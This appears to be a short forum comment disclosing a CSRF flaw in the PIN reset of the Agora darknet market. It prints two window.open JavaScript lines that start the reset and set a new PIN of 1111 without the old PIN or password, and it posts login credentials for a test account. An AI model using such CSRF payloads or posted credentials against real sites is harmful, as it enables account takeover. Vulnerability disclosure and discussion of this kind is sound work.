|
|
|
|
|
|
by garrettgrimsley
3973 days ago
|
|
|
It doesn't have to brute force the reset because Agora requires knowledge of neither the current PIN nor the current account password to reset the PIN. window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")
Starts the PIN reset process and window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")
sets the new PIN. For reference, Agora is lauded as one of the most secure darknet markets. You can see the lack of CSRF protection for yourself with the credentials username::password::pin ggHNpinReset::qwertyuiop::1234 |
|
|